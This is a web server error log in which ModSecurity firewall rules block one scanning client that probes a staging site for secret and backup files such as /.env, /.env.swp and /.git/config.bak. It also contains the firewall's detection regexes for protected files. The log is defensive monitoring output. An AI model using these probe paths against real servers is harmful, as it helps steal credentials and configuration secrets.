[Tue May 26 15:30:56.584001 2026] [security2:error] [pid 715645:tid 715801] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgRBwAAABo"]
[Tue May 26 15:30:56.586884 2026] [security2:error] [pid 715645:tid 715882] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgRCAAAAGs"]
[Tue May 26 15:30:56.627495 2026] [security2:error] [pid 715645:tid 715890] [client 195.178.110.199:41746] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.docker/.env"] [unique_id "ahVvWHVGgMGh8k213RgRFQAAAHM"]
[Tue May 26 15:30:56.644408 2026] [security2:error] [pid 715645:tid 715808] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgRDwAAACE"]
[Tue May 26 15:30:56.702128 2026] [security2:error] [pid 715645:tid 715830] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgRGAAAADc"]
[Tue May 26 15:30:56.742885 2026] [security2:error] [pid 715645:tid 715865] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgRHQAAAFo"]
[Tue May 26 15:30:56.775178 2026] [security2:error] [pid 715645:tid 715883] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgRIgAAAGw"]
[Tue May 26 15:30:56.787681 2026] [security2:error] [pid 715645:tid 715856] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgRJAAAAFE"]
[Tue May 26 15:30:56.828537 2026] [security2:error] [pid 715645:tid 715860] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgRKQAAAFU"]
[Tue May 26 15:30:56.833915 2026] [security2:error] [pid 715645:tid 715873] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgRKgAAAGI"]
[Tue May 26 15:30:56.851617 2026] [security2:error] [pid 715645:tid 715805] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgRLQAAAB4"]
[Tue May 26 15:30:56.869786 2026] [security2:error] [pid 715645:tid 715891] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgRMQAAAHQ"]
[Tue May 26 15:30:56.884574 2026] [security2:error] [pid 715645:tid 715809] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgROAAAACI"]
[Tue May 26 15:30:56.892387 2026] [security2:error] [pid 715645:tid 715881] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgRPAAAAGo"]
[Tue May 26 15:30:56.941597 2026] [security2:error] [pid 715645:tid 715863] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgRAQAAAFg"]
[Tue May 26 15:30:57.015306 2026] [security2:error] [pid 715645:tid 715899] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWHVGgMGh8k213RgRQgAAAHw"]
[Tue May 26 15:30:57.086178 2026] [security2:error] [pid 715645:tid 715792] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWXVGgMGh8k213RgRRgAAABE"]
[Tue May 26 15:30:57.177576 2026] [security2:error] [pid 715645:tid 715882] [client 195.178.110.199:41716] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.env.old"] [unique_id "ahVvWXVGgMGh8k213RgRSgAAAGs"]
[Tue May 26 15:30:57.179173 2026] [security2:error] [pid 715645:tid 715872] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWXVGgMGh8k213RgRSQAAAGE"]
[Tue May 26 15:30:57.277460 2026] [security2:error] [pid 715645:tid 715790] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWXVGgMGh8k213RgRUAAAAA8"]
[Tue May 26 15:30:57.311896 2026] [security2:error] [pid 715645:tid 715828] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWXVGgMGh8k213RgRUwAAADU"]
[Tue May 26 15:30:57.363857 2026] [security2:error] [pid 715645:tid 715795] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWXVGgMGh8k213RgRWQAAABQ"]
[Tue May 26 15:30:57.416022 2026] [security2:error] [pid 715645:tid 715806] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWXVGgMGh8k213RgRYAAAAB8"]
[Tue May 26 15:30:57.449142 2026] [security2:error] [pid 715645:tid 715841] [client 195.178.110.199:41656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/.env.php"] [unique_id "ahVvWXVGgMGh8k213RgRZgAAAEI"]
[Tue May 26 15:30:57.469900 2026] [security2:error] [pid 715645:tid 715815] [client 195.178.110.199:41726] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.env.swp"] [unique_id "ahVvWXVGgMGh8k213RgRZwAAACg"]
[Tue May 26 15:30:57.484300 2026] [security2:error] [pid 715645:tid 715823] [client 195.178.110.199:41744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.env~"] [unique_id "ahVvWXVGgMGh8k213RgRbgAAADA"]
[Tue May 26 15:30:57.520545 2026] [security2:error] [pid 715645:tid 715816] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWXVGgMGh8k213RgRawAAACk"]
[Tue May 26 15:30:57.523275 2026] [security2:error] [pid 715645:tid 715873] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWXVGgMGh8k213RgRbQAAAGI"]
[Tue May 26 15:30:57.523432 2026] [autoindex:error] [pid 715645:tid 715805] [client 195.178.110.199:0] AH01276: Cannot serve directory /home1/moesartc/public_html/unsobered.com/staging/.git/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:30:57.587491 2026] [security2:error] [pid 715645:tid 715840] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWXVGgMGh8k213RgRdgAAAEE"]
[Tue May 26 15:30:57.616342 2026] [security2:error] [pid 715645:tid 715793] [client 195.178.110.199:41726] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.git/config.bak"] [unique_id "ahVvWXVGgMGh8k213RgRiAAAABI"]
[Tue May 26 15:30:57.627461 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWXVGgMGh8k213RgRgQAAAAM"]
[Tue May 26 15:30:57.638856 2026] [security2:error] [pid 715645:tid 715899] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWXVGgMGh8k213RgRhAAAAHw"]
[Tue May 26 15:30:57.685023 2026] [security2:error] [pid 715645:tid 715807] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWXVGgMGh8k213RgRkQAAACA"]
[Tue May 26 15:30:57.730052 2026] [security2:error] [pid 715645:tid 715796] [client 195.178.110.199:41660] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.git/config.old"] [unique_id "ahVvWXVGgMGh8k213RgRlQAAABU"]
[Tue May 26 15:30:57.765677 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:41726] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.git/config~"] [unique_id "ahVvWXVGgMGh8k213RgRmAAAAEM"]
[Tue May 26 15:30:57.812974 2026] [security2:error] [pid 715645:tid 715895] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWXVGgMGh8k213RgRmQAAAHg"]
[Tue May 26 15:30:57.874394 2026] [security2:error] [pid 715645:tid 715815] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWXVGgMGh8k213RgRpAAAACg"]
[Tue May 26 15:30:57.924283 2026] [security2:error] [pid 715645:tid 715860] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWXVGgMGh8k213RgRqwAAAFU"]
[Tue May 26 15:30:58.039073 2026] [security2:error] [pid 715645:tid 715839] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWXVGgMGh8k213RgRvgAAAEA"]
[Tue May 26 15:30:58.108849 2026] [security2:error] [pid 715645:tid 715882] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgRzwAAAGs"]
[Tue May 26 15:30:58.188341 2026] [security2:error] [pid 715645:tid 715796] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgR3gAAABU"]
[Tue May 26 15:30:58.210766 2026] [security2:error] [pid 715645:tid 715830] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgR5AAAADc"]
[Tue May 26 15:30:58.259647 2026] [security2:error] [pid 715645:tid 715883] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgR6QAAAGw"]
[Tue May 26 15:30:58.263019 2026] [security2:error] [pid 715645:tid 715806] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgR6gAAAB8"]
[Tue May 26 15:30:58.266202 2026] [security2:error] [pid 715645:tid 715876] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgR7QAAAGU"]
[Tue May 26 15:30:58.340277 2026] [security2:error] [pid 715645:tid 715873] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgR8AAAAGI"]
[Tue May 26 15:30:58.353767 2026] [security2:error] [pid 715645:tid 715813] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgR8wAAACY"]
[Tue May 26 15:30:58.370201 2026] [security2:error] [pid 715645:tid 715891] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgR-QAAAHQ"]
[Tue May 26 15:30:58.372827 2026] [security2:error] [pid 715645:tid 715879] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgR9gAAAGg"]
[Tue May 26 15:30:58.381230 2026] [security2:error] [pid 715645:tid 715881] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgR_AAAAGo"]
[Tue May 26 15:30:58.397055 2026] [security2:error] [pid 715645:tid 715862] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgR_wAAAFc"]
[Tue May 26 15:30:58.411394 2026] [security2:error] [pid 715645:tid 715784] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSAgAAAAk"]
[Tue May 26 15:30:58.416771 2026] [security2:error] [pid 715645:tid 715846] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSBQAAAEc"]
[Tue May 26 15:30:58.437033 2026] [security2:error] [pid 715645:tid 715787] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSDAAAAAw"]
[Tue May 26 15:30:58.481324 2026] [security2:error] [pid 715645:tid 715882] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSFAAAAGs"]
[Tue May 26 15:30:58.513105 2026] [security2:error] [pid 715645:tid 715808] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSFwAAACE"]
[Tue May 26 15:30:58.538507 2026] [security2:error] [pid 715645:tid 715848] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSGgAAAEk"]
[Tue May 26 15:30:58.549320 2026] [security2:error] [pid 715645:tid 715867] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSHQAAAFw"]
[Tue May 26 15:30:58.549763 2026] [security2:error] [pid 715645:tid 715790] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSIAAAAA8"]
[Tue May 26 15:30:58.560260 2026] [security2:error] [pid 715645:tid 715811] [client 195.178.110.199:41636] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSIQAAACQ"]
[Tue May 26 15:30:58.572492 2026] [autoindex:error] [pid 715645:tid 715856] [client 195.178.110.199:0] AH01276: Cannot serve directory /home1/moesartc/public_html/unsobered.com/staging/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:30:58.631445 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSKAAAAGY"]
[Tue May 26 15:30:58.636917 2026] [security2:error] [pid 715645:tid 715844] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSKgAAAEU"]
[Tue May 26 15:30:58.654558 2026] [security2:error] [pid 715645:tid 715791] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSLQAAABA"]
[Tue May 26 15:30:58.674836 2026] [security2:error] [pid 715645:tid 715799] [client 195.178.110.199:41746] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/ADMIN/.env"] [unique_id "ahVvWnVGgMGh8k213RgSOgAAABg"]
[Tue May 26 15:30:58.684597 2026] [security2:error] [pid 715645:tid 715844] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSMAAAAEU"]
